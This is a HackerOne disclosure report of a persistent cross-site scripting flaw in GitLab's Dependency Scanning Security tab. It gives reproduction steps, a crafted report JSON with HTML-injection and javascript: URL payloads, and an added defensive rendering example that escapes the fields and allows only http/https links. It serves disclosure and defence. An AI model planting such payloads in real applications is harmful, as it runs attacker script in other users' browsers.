Dependency scanning Security Tab is Vulnerable to Persistent XSS
HackerOne report #418074 by ngalog on 2018-10-03:
Details:

PoC:
- Private project: https://gitlab.com/golduserngalog/securitything/pipelines/31864346
- Click Security Tab
- Click Dependency Scanning Expand
- Click Proto...
- Click Links
- Popup
{F354647}
Steps to reproduce:
- Create a new project and enable Auto DevOps
- Create the following files, .gitlab-ci.yml and gl-dependency-scanning-report.json

gl-dependency-scanning-report.json:

```json
[
  {
    "tool": "retire",
    "tools": [
      "retire"
    ],
    "message": "Proto<img src=x><img src=>type pollution attack for extend",
    "url": "javascript:alert(document.domain)//https://hackerone.com/reports/381185",
    "cve": "Protot<img src=x><img src=>ype pollution attack for extend",
    "priority": "Crit<img src=x><img src=>ical"
  }
]
```
.gitlab-ci.yml:

```yaml
image: alpine

.sast:
  script:
    - echo hi
  artifacts:
    paths:
      - gl-sast-report.json

dependency_scanning:
  script:
    - echo hi
  artifacts:
    paths:
      - gl-dependency-scanning-report.json
```
Impact
Persistent XSS in the Security tab; it also fires under the Security Dashboard.
Edited by Alexander Dietrich
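The report shows two distinct sinks: the `message`, `cve` and `priority` fields are inserted as HTML, and the `url` field becomes a clickable `href` without a scheme check. The following is an added example (not GitLab's code, and not part of the report) of how a frontend can render such report entries safely: escape every field for its HTML context and only accept absolute `http:`/`https:` links. `escapeHtml`, `safeHref` and `renderVulnerability` are names chosen here; the sample entry reuses the field values from the proof of concept above.

```javascript
// Added example (not GitLab code): defensive rendering of fields taken from an
// untrusted gl-dependency-scanning-report.json before they reach the DOM.

// Escape the characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Only absolute http(s) URLs may become clickable hrefs; every other scheme
// (javascript:, data:, vbscript:, ...) and any unparsable value is dropped.
function safeHref(url) {
  try {
    const parsed = new URL(String(url));
    return ['http:', 'https:'].includes(parsed.protocol) ? parsed.href : null;
  } catch (e) {
    return null;
  }
}

// Build one rendered vulnerability entry from untrusted report fields.
// Fields are escaped; the link is only emitted when the URL passed safeHref.
function renderVulnerability(entry) {
  const href = safeHref(entry.url);
  const title = escapeHtml(entry.message);
  const link = href
    ? `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${title}</a>`
    : `<span>${title}</span>`;
  return `<li>${link} (${escapeHtml(entry.cve)}, ${escapeHtml(entry.priority)})</li>`;
}

// Constructed input: the field values from the report's proof of concept.
const pocEntry = {
  tool: 'retire',
  message: 'Proto<img src=x><img src=>type pollution attack for extend',
  url: 'javascript:alert(document.domain)//https://hackerone.com/reports/381185',
  cve: 'Protot<img src=x><img src=>ype pollution attack for extend',
  priority: 'Crit<img src=x><img src=>ical',
};

// A benign entry for comparison: its link survives, its text is still escaped.
const benignEntry = {
  tool: 'retire',
  message: 'Prototype pollution attack for extend',
  url: 'https://hackerone.com/reports/381185',
  cve: 'N/A',
  priority: 'Critical',
};
```

Running `renderVulnerability(pocEntry)` yields a list item with no `<img>` tags and no link, while `renderVulnerability(benignEntry)` keeps the `https:` link intact.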